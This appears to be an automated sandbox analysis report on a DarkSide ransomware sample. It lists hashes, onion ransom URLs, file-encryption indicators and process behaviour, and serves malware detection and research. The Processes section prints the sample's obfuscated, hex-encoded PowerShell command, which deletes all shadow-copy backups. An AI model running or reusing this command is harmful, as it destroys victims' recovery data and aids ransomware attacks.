Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
11-05-2021 04:26
Static task
static1
Behavioral task
behavioral1
Sample
3.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
3.exe
Resource
win10v20210408
General
-
Target
3.exe
-
Size
17KB
-
MD5
9009593ebf5ea20407ab19bff045dc9d
-
SHA1
03c1f7458f3983c03a0f8124a01891242c3cc5df
-
SHA256
6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
-
SHA512
fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed
Malware Config
Extracted
C:\\README.7c0d2b67.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
3.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompressEnter.crw => C:\Users\Admin\Pictures\CompressEnter.crw.7c0d2b67 3.exe File opened for modification C:\Users\Admin\Pictures\MoveInstall.png.7c0d2b67 3.exe File renamed C:\Users\Admin\Pictures\MoveRequest.tif => C:\Users\Admin\Pictures\MoveRequest.tif.7c0d2b67 3.exe File renamed C:\Users\Admin\Pictures\UseUpdate.tiff => C:\Users\Admin\Pictures\UseUpdate.tiff.7c0d2b67 3.exe File opened for modification C:\Users\Admin\Pictures\CompressEnter.crw.7c0d2b67 3.exe File renamed C:\Users\Admin\Pictures\MoveInstall.png => C:\Users\Admin\Pictures\MoveInstall.png.7c0d2b67 3.exe File opened for modification C:\Users\Admin\Pictures\MoveRequest.tif.7c0d2b67 3.exe File opened for modification C:\Users\Admin\Pictures\UseUpdate.tiff 3.exe File opened for modification C:\Users\Admin\Pictures\UseUpdate.tiff.7c0d2b67 3.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
3.exepowershell.exepid process 1672 3.exe 1672 3.exe 1604 powershell.exe 1604 powershell.exe 1672 3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
3.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1672 3.exe Token: SeSecurityPrivilege 1672 3.exe Token: SeTakeOwnershipPrivilege 1672 3.exe Token: SeLoadDriverPrivilege 1672 3.exe Token: SeSystemProfilePrivilege 1672 3.exe Token: SeSystemtimePrivilege 1672 3.exe Token: SeProfSingleProcessPrivilege 1672 3.exe Token: SeIncBasePriorityPrivilege 1672 3.exe Token: SeCreatePagefilePrivilege 1672 3.exe Token: SeBackupPrivilege 1672 3.exe Token: SeRestorePrivilege 1672 3.exe Token: SeShutdownPrivilege 1672 3.exe Token: SeDebugPrivilege 1672 3.exe Token: SeSystemEnvironmentPrivilege 1672 3.exe Token: SeRemoteShutdownPrivilege 1672 3.exe Token: SeUndockPrivilege 1672 3.exe Token: SeManageVolumePrivilege 1672 3.exe Token: 33 1672 3.exe Token: 34 1672 3.exe Token: 35 1672 3.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeBackupPrivilege 764 vssvc.exe Token: SeRestorePrivilege 764 vssvc.exe Token: SeAuditPrivilege 764 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
3.exedescription pid process target process PID 1672 wrote to memory of 1604 1672 3.exe powershell.exe PID 1672 wrote to memory of 1604 1672 3.exe powershell.exe PID 1672 wrote to memory of 1604 1672 3.exe powershell.exe PID 1672 wrote to memory of 1604 1672 3.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
aff3f177f0b4afda2803cf7bf5a4b506
SHA171d2bbc11c2ba1c6bf4f7a43ababa9518a09abef
SHA25603a21a36eb9b71c76573a61d93a5259485c62e16a98b23fde6f194c0f68f24b9
SHA5123a4d1ea33b1da55e5e8515a9581997972d84f3c29da7bdda1f8309afa3a5eb0f532d07e80533900487ebdd2d7b402289c6e7a4cd30935c0935c11cce2efda5e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
38ed2d03c9b5bb415015840d055a9341
SHA15cb0b8ce0ff56591025faf9f837f0431bb72a14c
SHA256cdec19d6b5917f38e50316d7fbe5d393f696529a9f838df4a391ed554dbf3abf
SHA5129322584c977166024962e961fe5baf35418e8275604e29b547ccf27636e8dee82fe0c0dd591012d65d1bedb9dcdc214a855a0b0c7ad9b1307250b00f28c847d8
-
memory/1604-65-0x000000001A920000-0x000000001A922000-memory.dmpFilesize
8KB
-
memory/1604-62-0x0000000002710000-0x0000000002711000-memory.dmpFilesize
4KB
-
memory/1604-63-0x000000001A9A0000-0x000000001A9A1000-memory.dmpFilesize
4KB
-
memory/1604-64-0x0000000002750000-0x0000000002751000-memory.dmpFilesize
4KB
-
memory/1604-66-0x000000001A924000-0x000000001A926000-memory.dmpFilesize
8KB
-
memory/1604-67-0x0000000002370000-0x0000000002371000-memory.dmpFilesize
4KB
-
memory/1604-68-0x000000001C010000-0x000000001C011000-memory.dmpFilesize
4KB
-
memory/1604-69-0x000000001C250000-0x000000001C251000-memory.dmpFilesize
4KB
-
memory/1604-61-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmpFilesize
8KB
-
memory/1604-60-0x0000000000000000-mapping.dmp
-
memory/1672-59-0x0000000075971000-0x0000000075973000-memory.dmpFilesize
8KB